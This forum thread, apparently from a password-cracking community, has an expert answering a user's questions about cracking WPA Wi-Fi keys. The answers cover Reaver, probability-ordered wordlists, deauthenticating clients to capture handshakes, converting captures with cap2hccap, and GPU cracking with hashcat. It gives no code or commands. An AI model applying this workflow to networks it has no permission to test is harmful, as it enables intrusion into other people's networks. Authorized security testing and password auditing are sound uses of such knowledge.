06-01-2013, 10:15 PM
(06-01-2013, 12:17 PM)lukeman3000 Wrote: Hi -
Hello -
(06-01-2013, 12:17 PM)lukeman3000 Wrote: I have some questions regarding cracking in general:
I have some answers regarding cracking in general, but your questions all seem to be about WPA, so I'll give you answers regarding WPA cracking instead.
(06-01-2013, 12:17 PM)lukeman3000 Wrote: 1. Does it make more sense to use several smaller dictionary files, or one or two large ones? Why? For example, using a single, gigantic dictionary list means that you would probably spend a lot of time in each letter. Is a linear approach (going from start to finish) statistically better or worse than it being randomized?
Gigantic dictionaries never make sense. Using several smaller, probabilisticly-ordered wordlists is always the way to go. Randomized never makes sense, you want to try the most likely candidates first and taper off.
(06-01-2013, 12:17 PM)lukeman3000 Wrote: 2. In other words, do dictionary lists go from start to finish, in the same order, each and every time, or can the words that are read from the dictionary file be randomized? What makes the most sense?
The dictionaries go from start to finish in (roughly) the same order every time.
(06-01-2013, 12:17 PM)lukeman3000 Wrote: 3. The way I understand WPA cracking is that one starts with Reaver. If unsuccessful, one should try a dictionary attack. And as a matter of last resort, a brute force attack. Is this correct?
Pretty much, except brute forcing WPA does not make any sense unless the key is all digits. And even then you better have an idea of what the key is.
(06-01-2013, 12:17 PM)lukeman3000 Wrote: 4. Regarding dictionary attacks, there seem to be so many options available. Hashcat, Pyrit, coWPAtty, rainbow tables, dictionary files, etc..
Just use hashcat.
(06-01-2013, 12:17 PM)lukeman3000 Wrote: I have spent several hours trying to figure out what is (currently) the best option, and it's still not clear to me. In terms of a dictionary attack, Hascat using regular dictionary files seems to be my best bet. Seeing as how Hashcat is GPU-accelerated and I have a GTX-690 (only one), this option seems to make sense for me. Am I wrong?
No, you are not wrong.
(06-01-2013, 12:17 PM)lukeman3000 Wrote: 5. Which version of Hashcat should I get?
All of them.
(06-01-2013, 12:17 PM)lukeman3000 Wrote: 6. Finally; my understanding of the process of Hashcat is to obtain a handshake by de-authenticating a client (I can inject), taking that file and converting it here using the online tool (why is that hosted online and not a part of Hashcat itself? - just curious), and finally, to run Hashcat with my selected Dictionary files.
You don't have to use the online tool, you can download cap2hccap. The download link is provided on the page where you upload your cap. Otherwise, this is correct.